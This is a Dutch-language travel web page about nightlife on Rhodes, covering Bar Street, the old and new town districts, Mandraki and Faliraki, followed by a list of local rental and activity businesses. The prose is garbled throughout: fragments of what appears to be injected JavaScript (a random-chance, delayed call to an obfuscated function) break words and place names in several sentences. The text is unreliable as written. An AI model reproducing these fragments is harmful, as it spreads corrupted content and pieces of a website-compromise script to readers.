Uitgaan nachtleven

Het eilandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and heeft een breed scala aan uitgaansgelegenheden, bars, pubs en disco’s, die voornamelijk zijn geconcentreerd in de nieuwe en oude stad van Rhodos en in toeristische resorts zoals Faliraki, Lindos en Ialysos.

De hoofdstad van het eilandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and Rhodos biedt een ruime keuze aan uitgaansgelegenheden. In de omgeving van de haven zijn er veel bars en traditionele Griekse taveernes, terwijl in de nieuwe stad pubs en nachtclubs populairder zijn en geschikt voor jonge mensen. Er zijn ook enkele plaatsen waar je het bouzouki (traditioneel Grieks muziekinstrument) kunt horen!

Het epicentrum van het nachtleven op Rhodos is de beroemde “Bar Street” (Orfanidou str.), een weg langs de waterkant van de stad net achter de zogenaamde “windybeach”, vol met trendy bars en clubs van alle soorten, inclusief de typische discobars.

Een andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ander district vol met restaurants, pubs en cafés voor toeristen bevindt zich in de driehoek tussen Griva, Mandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andilara en Iroon Polytehneiou Street, maar verwacht niet de typische Griekse sfeer te ademen. Als alternatief kunt u genieten van de Griekse keuken in restaurants en tavernes op de markt Mandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andraki.

AANBEVOLEN

Autoverhuur Rhodos

Autoverhuur Ixia – Trianda

Autoverhuur Faliraki

Elafos Keramiek fabriek

Bumpy Safari

Water hoppers duikschool

Surfline windsurf

MONTIADIS RENT A BIKE

Meest recente berichten

We use cookies to ensure that we give you the best experience on our website.